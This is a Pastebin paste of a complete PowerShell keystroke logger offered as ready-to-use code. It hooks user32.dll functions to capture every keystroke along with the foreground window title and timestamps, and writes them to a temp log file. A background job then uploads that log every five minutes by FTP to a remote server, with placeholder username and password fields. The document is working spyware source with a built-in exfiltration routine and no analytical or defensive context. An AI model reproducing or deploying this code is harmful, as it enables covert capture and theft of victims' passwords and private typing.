Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <#
- PowerShell keystroke logger
- Pasted together by
- |-TheDoctor-|
- #>
- function KeyLog {
- # MapVirtualKeyMapTypes
- # <summary>
- # uCode is a virtual-key code and is translated into a scan code.
- # If it is a virtual-key code that does not distinguish between left- and
- # right-hand keys, the left-hand scan code is returned.
- # If there is no translation, the function returns 0.
- # </summary>
- $MAPVK_VK_TO_VSC = 0x00
- # <summary>
- # uCode is a scan code and is translated into a virtual-key code that
- # does not distinguish between left- and right-hand keys. If there is no
- # translation, the function returns 0.
- # </summary>
- $MAPVK_VSC_TO_VK = 0x01
- # <summary>
- # uCode is a virtual-key code and is translated into an unshifted
- # character value in the low-order word of the return value. Dead keys (diacritics)
- # are indicated by setting the top bit of the return value. If there is no
- # translation, the function returns 0.
- # </summary>
- $MAPVK_VK_TO_CHAR = 0x02
- # <summary>
- # Windows NT/2000/XP: uCode is a scan code and is translated into a
- # virtual-key code that distinguishes between left- and right-hand keys. If
- # there is no translation, the function returns 0.
- # </summary>
- $MAPVK_VSC_TO_VK_EX = 0x03
- # <summary>
- # Not currently documented
- # </summary>
- $MAPVK_VK_TO_VSC_EX = 0x04
- $virtualkc_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
- public static extern short GetAsyncKeyState(int virtualKeyCode);
- '@
- $kbstate_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int GetKeyboardState(byte[] keystate);
- '@
- $mapchar_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int MapVirtualKey(uint uCode, int uMapType);
- '@
- $tounicode_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
- '@
- $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
- $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
- $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
- $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
- try
- {
- $ImportDll = [User32]
- }
- catch
- {
- $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
- $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
- $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')
- $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
- $FieldArray = [Reflection.FieldInfo[]] @(
- [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
- [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
- [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
- [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
- [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
- [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
- )
- $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
- $FieldValueArray = [Object[]] @(
- 'GetAsyncKeyState',
- $True,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
- $FieldValueArray = [Object[]] @(
- 'GetKeyboardState',
- $True,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
- $FieldValueArray = [Object[]] @(
- 'MapVirtualKey',
- $False,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
- [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
- $FieldValueArray = [Object[]] @(
- 'ToUnicode',
- $False,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
- $FieldValueArray = [Object[]] @(
- 'GetForegroundWindow',
- $True,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- $ImportDll = $TypeBuilder.CreateType()
- }
- while ($true) {
- Start-Sleep -Milliseconds 40
- $gotit = ""
- for ($char = 1; $char -le 254; $char++) {
- $vkey = $char
- $gotit = $getKeyState::GetAsyncKeyState($vkey)
- if ($gotit -eq -32767) {
- $EnterKey = $getKeyState::GetAsyncKeyState(13)
- $TabKey = $getKeyState::GetAsyncKeyState(9)
- $DeleteKey = $getKeyState::GetAsyncKeyState(46)
- $BackSpaceKey = $getKeyState::GetAsyncKeyState(8)
- $LeftArrow = $getKeyState::GetAsyncKeyState(37)
- $UpArrow = $getKeyState::GetAsyncKeyState(38)
- $RightArrow = $getKeyState::GetAsyncKeyState(39)
- $DownArrow = $getKeyState::GetAsyncKeyState(40)
- $caps_lock = [console]::CapsLock
- $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
- $kbstate = New-Object Byte[] 256
- $checkkbstate = $getKBState::GetKeyboardState($kbstate)
- $TopWindow = $ImportDll::GetForegroundWindow()
- $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
- $LogOutput = "`"" + $WindowTitle + "`"`t`t`t"
- $mychar = New-Object -TypeName "System.Text.StringBuilder";
- $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
- $LogOutput += $mychar.ToString();
- if ($EnterKey) {$LogOutput += '[ENTER]'}
- if ($TabKey) {$LogOutput += '[Tab]'}
- if ($DeleteKey) {$LogOutput += '[Delete]'}
- if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
- if ($LeftArrow) {$LogOutput += '[Left Arrow]'}
- if ($RightArrow) {$LogOutput += '[Right Arrow]'}
- if ($UpArrow) {$LogOutput += '[Up Arrow]'}
- if ($DownArrow) {$LogOutput += '[Down Arrow]'}
- $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
- $LogOutput += "`t`t`t`t`t" + $TimeStamp
- if ($unicode_res -gt 0) {
- $logfile = "$env:temp\key.log"
- $LogOutput | Out-File -FilePath $logfile -Append
- }
- }
- }
- }
- }
- Start-Job {
- # Config
- $Username = "YourUsername"
- $Password = "YourPassword"
- $LocalFile = "$env:temp\key.log"
- $RemoteFile = "ftp://example.net/Log.txt"
- $SleepTime = 300
- while (1 -eq 1)
- {
- # Sleep for specified time
- Start-Sleep -Seconds $SleepTime
- # Create FTP Rquest Object
- $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
- $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
- $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
- $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password)
- $FTPRequest.UseBinary = $true
- $FTPRequest.UsePassive = $true
- # Read the File for Upload
- $FileContent = gc -en byte $LocalFile
- $FTPRequest.ContentLength = $FileContent.Length
- # Get Stream Request by bytes
- $Run = $FTPRequest.GetRequestStream()
- $Run.Write($FileContent, 0, $FileContent.Length)
- # Cleanup
- $Run.Close()
- $Run.Dispose()
- }
- }
- KeyLog
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement